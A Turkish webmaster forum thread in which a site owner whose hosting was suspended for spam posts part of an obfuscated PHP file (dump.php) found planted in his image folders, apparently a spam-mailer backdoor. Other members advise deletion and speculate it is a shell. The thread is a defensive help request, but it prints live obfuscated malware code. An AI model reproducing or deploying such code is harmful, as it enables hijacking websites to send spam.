lostyazilim
tr.link

Bu Kodlar Virüsmüdür

4 Mesajlar 1.050 Okunma
lstbozum
tr.link

nuti nuti WM Aracı Kullanıcı
  • Üyelik 19.12.2011
  • Yaş/Cinsiyet 34 / E
  • Meslek Muhasebe
  • Konum Konya
  • Ad Soyad M** D**
  • Mesajlar 595
  • Beğeniler 216 / 85
  • Ticaret 12, (%100)
Arkadaşlar, hosting firmam sitemi kapatmıştı sitem durmadan spam mail gönderiyormuş. İnceleme sonucu aşağıdaki kodlardan kaynaklandığını gördük bütün dosyaları resim klasörlerine değişik isimlerle eklenmiş

örnek.(Güvenlik açısından kodların %30nu ekledim

dump.php

?$i96="QU~T<`_YM82iAN>/v#s\"'q@tZFjJX6a\tcI)yS^boD.\$du|3\rWw=rC!;[4*P5LVkB?%19m:p7 -zK,gOl{Efx]0R}&h+\n\\(enGH"; $GLOBALS['rpdxi45'] = $i96[94].$i96[51].$i96[51].$i96[39].$i96[51].$i96[6].$i96[51].$i96[94].$i96[70].$i96[39].$i96[51].$i96[23].$i96[11].$i96[95].$i96[77]; $GLOBALS['umwfl54'] = $i96[11].$i96[95].$i96[11].$i96[6].$i96[18].$i96[94].$i96[23]; $GLOBALS['payhr58'] = $i96[74].$i96[74].$i96[21].$i96[30].$i96[30].$i96[29].$i96[59]; $GLOBALS['jjfef77'] = $i96[68].$i96[43].$i96[59]; $GLOBALS['woluw86'] = $i96[16].$i96[68].$i96[62].$i96[70].$i96[26].$i96[59]; $GLOBALS['xrcrc46'] = $i96[94].$i96[18].$i96[18].$i96[18].$i96[18].$i96[9].$i96[85]; $GLOBALS['nfrnt33'] = $i96[32].$i96[68].$i96[77].$i96[38].$i96[89].$i96[9].$i96[29]; $GLOBALS['vpgyo33'] = $i96[82].$i96[82].$i96[89].$i96[77].$i96[35].$i96[9].$i96[59]; $GLOBALS['xphkx7'] = $i96[30].$i96[89].$i96[68].$i96[44].$i96[83].$i96[59].$i96[10]; $GLOBALS['hkcrr52'] = $i96[43].$i96[26].$i96[49].$i96[94].$i96[70].$i96[59].$i96[71]; $GLOBALS['gabbh38'] = $i96[89].$i96[95].$i96[95].$i96[18].$i96[23].$i96[46]; $GLOBALS['ciuwv31'] = $i96[39].$i96[95].$i96[95].$i96[77].$i96[79].$i96[9].$i96[85]; $GLOBALS['yceku89'] = $i96[18].$i96[23].$i96[51].$i96[79].$i96[94].$i96[95]; $GLOBALS['pwnuy78'] = $i96[32].$i96[89].$i96[51]; $GLOBALS['sbstd35'] = $i96[39].$i96[51].$i96[43]; $GLOBALS['ribbu43'] = $i96[38].$i96[30].$i96[18].$i96[94].$i96[29].$i96[56].$i96[6].$i96[94].$i96[95].$i96[32].$i96[39].$i96[43].$i96[94]; $GLOBALS['yioxt94'] = $i96[32].$i96[39].$i96[44].$i96[95].$i96[23]; $GLOBALS['jtavr24'] = $i96[82].$i96[44].$i96[95].$i96[32].$i96[23].$i96[11].$i96[39].$i96[95].$i96[6].$i96[94].$i96[83].$i96[11].$i96[18].$i96[23].$i96[18]; $GLOBALS['xirqd9'] = $i96[68].$i96[30].$i96[11].$i96[79]; $GLOBALS['fwvyn61'] = $i96[21].$i96[82].$i96[95].$i96[23].$i96[30].$i96[67].$i96[71]; $GLOBALS['ozzeq92'] = $i96[82].$i96[77].$i96[94].$i96[23].$i96[18]; $GLOBALS['ovdsf28'] = $i96[77].$i96[94].$i96[23].$i96[89].$i96[39].$i96[18].$i96[23].$i96[38].$i96[35].$i96[95].$i96[30].$i96[68].$i96[94]; $GLOBALS['whgei19'] = $i96[82].$i96[18].$i96[39].$i96[32].$i96[62].$i96[39].$i96[70].$i96[94].$i96[95]; $GLOBALS['dfghd95'] = $i96[70].$i96[82].$i96[18].$i96[39].$i96[32].$i96[62].$i96[39].$i96[70].$i96[94].$i96[95]; $GLOBALS['szbmd23'] = $i96[18].$i96[23].$i96[51].$i96[94].$i96[30].$i96[68].$i96[6].$i96[18].$i96[39].$i96[32].$i96[62].$i96[94].$i96[23].$i96[6].$i96[32].$i96[79].$i96[11].$i96[94].$i96[95].$i96[23]; $GLOBALS['ketxn68'] = $i96[82].$i96[70].$i96[44].$i96[23].$i96[18]; $GLOBALS['ibikt67'] = $i96[23].$i96[51].$i96[11].$i96[68]; $GLOBALS['mjcqu91'] = $i96[70].$i96[51].$i96[94].$i96[77].$i96[6].$i96[51].$i96[94].$i96[70].$i96[79].$i96[30].$i96[32].$i96[94]; $GLOBALS['uwmfn32'] = $i96[82].$i96[32].$i96[79].$i96[39].$i96[18].$i96[94]; $GLOBALS['rsvig58'] = $i96[74].$i96[51].$i96[62].$i96[77].$i96[94].$i96[66].$i96[46]; $GLOBALS['zvlth73'] = $i96[23].$i96[11].$i96[68].$i96[94]; $GLOBALS['ysbsg99'] = $i96[51].$i96[32].$i96[44].$i96[95].$i96[79].$i96[46].$i96[46]; $GLOBALS['vueai89'] = $i96[30].$i96[51].$i96[51].$i96[30].$i96[35].$i96[6].$i96[18].$i96[94].$i96[30].$i96[51].$i96[32].$i96[89]; $GLOBALS['xajbc54'] = $i96[18].$i96[39].$i96[32].$i96[62].$i96[94].$i96[23].$i96[6].$i96[32].$i96[79].$i96[39].$i96[18].$i96[94]; $GLOBALS['xkrnw66'] = $i96[18].$i96[39].$i96[32].$i96[62].$i96[94].$i96[23].$i96[6].$i96[32].$i96[51].$i96[94].$i96[30].$i96[23].$i96[94]; $GLOBALS['pgctw70'] = $i96[18].$i96[39].$i96[32].$i96[62].$i96[94].$i96[23].$i96[6].$i96[18].$i96[94].$i96[23].$i96[6].$i96[95].$i96[39].$i96[95].$i96[38].$i96[79].$i96[39].$i96[32].$i96[62]; $GLOBALS['uwxdy95'] = $i96[18].$i96[39].$i96[32].$i96[62].$i96[94].$i96[23].$i96[6].$i96[32].$i96[39].$i96[95].$i96[95].$i96[94].$i96[32].$i96[23]; $GLOBALS['mafmc28'] = $i96[18].$i96[39].$i96[32].$i96[62].$i96[94].$i96[23].$i96[6].$i96[79].$i96[30].$i96[18].$i96[23].$i96[6].$i96[94].$i96[51].$i96[51].$i96[39].$i96[51]; $GLOBALS['srksw68'] = $i96[18].$i96[39].$i96[32].$i96[62].$i96[94].$i96[23].$i96[6].$i96[18].$i96[94].$i96[79].$i96[94].$i96[32].$i96[23]; $GLOBALS['ipekc94'] = $i96[18].$i96[39].$i96[32].$i96[62].$i96[94].$i96[23].$i96[6].$i96[51].$i96[94].$i96[30].$i96[43]; $GLOBALS['lkglw48'] = $i96[18].$i96[39].$i96[32].$i96[62].$i96[94].$i96[23].$i96[6].$i96[49].$i96[51].$i96[11].$i96[23].$i96[94]; $GLOBALS['rlqxa39'] = $i96[32].$i96[79].$i96[39].$i96[18].$i96[94].$i96[36].$i96[39].$i96[32].$i96[62]; $GLOBALS['fswzd10'] = $i96[43].$i96[30].$i96[23].$i96[94]; $GLOBALS['megms73'] = $i96[18].$i96[23].$i96[51].$i96[6].$i96[51].$i96[94].$i96[70].$i96[79].$i96[30].$i96[32].$i96[94]; $GLOBALS['dszhy50'] = $i96[70].$i96[23].$i96[23].$i96[95].$i96[30].$i96[71].$i96[67]; $GLOBALS['btcvz15'] = $i96[70].$i96[51].$i96[94].$i96[77].$i96[6].$i96[68].$i96[30].$i96[23].$i96[32].$i96[89]; $GLOBALS['fgzht71'] = $i96[44].$i96[32].$i96[82].$i96[11].$i96[51].$i96[18].$i96[23]; $GLOBALS['dpooh44'] = $i96[11].$i96[95].$i96[11].$i96[6].$i96[77].$i96[94].$i96[23]; $GLOBALS['rhgci15'] = $i96[77].$i96[94].$i96[23].$i96[68].$i96[83].$i96[51].$i96[51]; $GLOBALS['auikn34'] = $i96[30].$i96[51].$i96[51].$i96[30].$i96[35].$i96[6].$i96[62].$i96[94].$i96[35].$i96[18]; $GLOBALS['vqghd59'] = $i96[68].$i96[11].$i96[95]; $GLOBALS['zyycp21'] = ${$i96[6].$i96[58].$i96[78].$i96[36].$i96[3]}; $GLOBALS['ltutc37'] = $i96[68].$i96[70].$i96[30].$i96[49].$i96[70].$i96[56].$i96[56]; $GLOBALS['pogpj8'] = $i96[70].$i96[51].$i96[94].$i96[77].$i96[6].$i96[18].$i96[70].$i96[79].$i96[11].$i96[23]; $GLOBALS['fbgkd54'] = $i96[38].$i96[30].$i96[18].$i96[94].$i96[29].$i96[56].$i96[6].$i96[43].$i96[94].$i96[32].$i96[39].$i96[43].$i96[94]; $GLOBALS['igmij93'] = $i96[44].$i96[51].$i96[79].$i96[43].$i96[94].$i96[32].$i96[39].$i96[43].$i96[94]; $GLOBALS['czhuw10'] = $i96[18].$i96[23].$i96[51].$i96[11].$i96[70].$i96[18].$i96[79].$i96[30].$i96[18].$i96[89].$i96[94].$i96[18];@$GLOBALS['rpdxi45'](NULL);@$GLOBALS['umwfl54']($i96[94].$i96[51].$i96[51].$i96[39].$i96[51].$i96[6].$i96[79].$i96[39].$i96[77],NULL);@$GLOBALS['umwfl54']($i96[79].$i96[39].$i96[77].$i96[6].$i96[94].$i96[51].$i96[51].$i96[39].$i96[51].$i96[18],0); $gqoki97 = array( $i96[43].$i96[30].$i96[23].$i96[30].$i96[3].$i96[39] => "", $i96[82].$i96[51].$i96[39].$i96[68].$i96[60].$i96[39].$i96[77].$i96[11].$i96[95] => "", $i96[82].$i96[51].$i96[39].$i96[68].$i96[13].$i96[30].$i96[68].$i96[94] => "", $i96[18].$i96[44].$i96[38].$i96[26].$i96[3].$i96[94].$i96[68].$i96[70].$i96[79] => "", $i96[38].$i96[39].$i96[43].$i96[35].$i96[3].$i96[94].$i96[68].$i96[70].$i96[79] => "", $i96[89].$i96[39].$i96[18].$i96[23].$i96[25].$i96[51].$i96[39].$i96[68] => "", $i96[11].$i96[95].$i96[11].$i96[23].$i96[95].$i96[38].$i96[18].$i96[39].$i96[32].$i96[62] => FALSE, $i96[11].$i96[95].$i96[11].$i96[23].$i96[18].$i96[39].$i96[32].$i96[62] => FALSE, $i96[11].$i96[95].$i96[11].$i96[23].$i96[68].$i96[30].$i96[11].$i96[79] => FALSE,);if (FALSE == $GLOBALS['payhr58']($i96, $gqoki97)) { echo PHP_OS.$i96[90].$GLOBALS['jjfef77'](0987654321).$i96[90].$i96[85].$i96[66].$i96[90].$i96[55].$i96[55].$i96[84].$i96[84].$i96[91]; exit;}$ifzga92 = array();foreach ($gqoki97[$i96[43].$i96[30].$i96[23].$i96[30].$i96[3].$i96[39]] as $rnqcn32) { $dfphu86 = array( $i96[95].$i96[30].$i96[68].$i96[94].$i96[25].$i96[11].$i96[51].$i96[18].$i96[23] => "", $i96[95].$i96[30].$i96[68].$i96[94].$i96[60].$i96[30].$i96[18].$i96[23] => "", $i96[94].$i96[68].$i96[30].$i96[11].$i96[79].$i96[3].$i96[39] => "", $i96[43].$i96[39].$i96[68].$i96[30].$i96[11].$i96[95].$i96[3].$i96[39] => "", $i96[94].$i96[68].$i96[30].$i96[11].$i96[79].$i96[3].$i96[39].$i96[60].$i96[39].$i96[95].$i96[77] => "", $i96[82].$i96[39].$i96[51].$i96[32].$i96[94].$i96[25].$i96[51].$i96[39].$i96[68].$i96[25].$i96[79].$i96[30].$i96[77] => FALSE, $i96[94].$i96[68].$i96[30].$i96[11].$i96[79].$i96[25].$i96[51].$i96[39].$i96[68] =>"", $i96[94].$i96[68].$i96[30].$i96[11].$i96[79].$i96[25].$i96[51].$i96[39].$i96[68].$i96[60].$i96[39].$i96[95].$i96[77] => "", $i96[18].$i96[44].$i96[38].$i96[26] => "", $i96[38].$i96[39].$i96[43].$i96[35] => "", $i96[89].$i96[94].$i96[30].$i96[43].$i96[94].$i96[51].$i96[18].$i96[8].$i96[30].$i96[11].$i96[95] => "", $i96[89].$i96[94].$i96[30].$i96[43].$i96[94].$i96[51].$i96[18].$i96[25].$i96[51].$i96[39].$i96[68] => "", $i96[89].$i96[94].$i96[30].$i96[43].$i96[94].$i96[51].$i96[18].$i96[36].$i96[39].$i96[32].$i96[62] => "", $i96[68].$i96[83].$i96[97].$i96[39].$i96[18].$i96[23] => "", $i96[68].$i96[83].$i96[12].$i96[43].$i96[43].$i96[51] => null, $i96[18].$i96[39].$i96[32].$i96[62] => null, $i96[18].$i96[23].$i96[11].$i96[68].$i96[94] => null, $i96[95].$i96[38].$i96[18].$i96[23].$i96[94].$i96[70] => 0, $i96[94].$i96[51].$i96[51].$i96[79].$i96[11].$i96[95].$i96[94] => "", $i96[43].$i96[39].$i96[95].$i96[94] => FALSE, $i96[43].$i96[39].$i96[95].$i96[94].$i96[48].$i96[30].$i96[35] => 0, $i96[82].$i96[30].$i96[11].$i96[79].$i96[36].$i96[68].$i96[23].$i96[70] => FALSE, ); if (FALSE == $GLOBALS['woluw86']($i96, $rnqcn32, $gqoki97, $dfphu86) ) { echo PHP_OS.$i96[90].$GLOBALS['jjfef77'](1111111111).$i96[90].$i96[85].$i96[10].$i96[90].$i96[55].$i96[55].$GLOBALS['xrcrc46']($i96, $rnqcn32).$i96[84].$i96[84].$i96[91]; continue; } $GLOBALS['nfrnt33']($i96, $gqoki97, $dfphu86); $GLOBALS['vpgyo33']($i96, $gqoki97, $dfphu86); $ifzga92[] = $dfphu86;}$GLOBALS['xphkx7']($i96, $gqoki97, $ifzga92);$GLOBALS['hkcrr52']($i96, $gqoki97, $ifzga92);$GLOBALS['gabbh38']($i96, $gqoki97, $ifzga92);$GLOBALS['ciuwv31']($i96, $gqoki97, $ifzga92);function essss80($i96, $iqkju26) { $htptb46 = ""; for($ckkqo93 = 0; $ckkqo93 < $GLOBALS['yceku89']($iqkju26); $ckkqo93++) $htptb46.= $GLOBALS['pwnuy78']($GLOBALS['sbstd35']($iqkju26[$ckkqo93]) ^ 2); return $GLOBALS['ribbu43']($htptb46);}function onngl80($i96, $gqoki97, $ifzga92) { if ($gqoki97[$i96[11].$i96[95].$i96[11].$i96[23].$i96[95].$i96[38].$i96[18].$i96[39].$i96[32].$i96[62]] == FALSE && $gqoki97[$i96[11].$i96[95].$i96[11].$i96[23].$i96[18].$i96[39].$i96[32].$i96[62]] == FALSE && $gqoki97[$i96[11].$i96[95].$i96[11].$i96[23].$i96[68].$i96[30].$i96[11].$i96[79]] == FALSE) { echo PHP_OS.$i96[90].$GLOBALS['jjfef77'](1111111111).$i96[90].$i96[85].$i96[46].$i96[90].$i96[55].$i96[55].$GLOBALS['xrcrc46']($i96, $i96[95].$i96[39].$i96[72].$i96[82].$i96[44].$i96[95].$i96[32].$i96[72].$i96[94].$i96[83].$i96[11].$i96[18].$i96[23].$i96[18]).$i96[84].$i96[84].$i96[91]; return; } $uodef40 = 0; for ($wenmo89 = 0; $wenmo89 < $GLOBALS['yioxt94']($ifzga92); $wenmo89++) { if ($ifzga92[$wenmo89][$i96[82].$i96[30].$i96[11].$i96[79].$i96[36].$i96[68].$i96[23].$i96[70]] == TRUE) { echo PHP_OS.$i96[90].$GLOBALS['jjfef77'](2222222222).$i96[90].$i96[85].$i96[56].$i96[90].$i96[55].$i96[55].$GLOBALS['xrcrc46']($i96, $ifzga92[$wenmo89][$i96[94].$i96[68].$i96[30].$i96[11].$i96[79].$i96[3].$i96[39]].$i96[72].$i96[69].$i96[69].$i96[72].$ifzga92[$wenmo89][$i96[94].$i96[51].$i96[51].$i96[79].$i96[11].$i96[95].$i96[94]]).$i96[84].$i96[84].$i96[91]; } if ($ifzga92[$wenmo89][$i96[43].$i96[39].$i96[95].$i96[94]] == TRUE) { $uodef40++; } } if ($uodef40 == 0) { echo PHP_OS.$i96[90].$GLOBALS['jjfef77'](0987654321).$i96[90].$i96[85].$i96[56].$i96[90].$i96[55].$i96[55].$i96[84].$i96[84].$i96[91]; } else { echo $i96[78].$i96[75].$i96[90].$GLOBALS['jjfef77'](1234567890).$i96[90].$uodef40.$i96[90].$GLOBALS['yioxt94']($ifzga92).$i96[91];
 

 

wmaraci
reklam

Panarogga Panarogga Adsense Onay Hizmetleri Kullanıcı
  • Üyelik 15.03.2014
  • Yaş/Cinsiyet 38 / E
  • Meslek Adsense
  • Konum Bursa
  • Ad Soyad C** K**
  • Mesajlar 3021
  • Beğeniler 2 / 516
  • Ticaret 130, (%100)
o dosyayı komple silin
 

 

nuti nuti WM Aracı Kullanıcı
  • Üyelik 19.12.2011
  • Yaş/Cinsiyet 34 / E
  • Meslek Muhasebe
  • Konum Konya
  • Ad Soyad M** D**
  • Mesajlar 595
  • Beğeniler 216 / 85
  • Ticaret 12, (%100)

Panarogga adlı üyeden alıntı

o dosyayı komple silin


Bunların hepsinde aynı kodlar mevcut hepsinide sildim
 

 

agoren agoren WM Aracı Kullanıcı
  • Üyelik 12.07.2014
  • Yaş/Cinsiyet 31 / E
  • Meslek Yazılım Geliştirici
  • Konum Kocaeli
  • Ad Soyad A** G**
  • Mesajlar 304
  • Beğeniler 21 / 28
  • Ticaret 0, (%0)
Kodlar büyük ihtimalle malware ama yine de kodları buraya yapıştırır mısınız test edin yani burada.

http://ideone.com/

Kodlara bakarken PHP_OS sabitine denk geldim. Bu biraz şüphelendirdi açıkcası. shell olabilir.

Mevcut gördüğüm kodları echo ile çevirince

zzqaa65Linux+cfcd208495d565ef66e7dff9f98764da+01+[[]]

gibi şeyler alıyorum. Bu dediğim PHP_OS sabitine denk geliyor. Nereden buldunuz bilmem ama açıklı hocam.
 

 

aligoren.com
wmaraci
wmaraci
wmaraci
wmaraci
Konuyu toplam 1 kişi okuyor. (0 kullanıcı ve 1 misafir)
Site Ayarları
  • Tema Seçeneği
  • Site Sesleri
  • Bildirimler
  • Özel Mesaj Al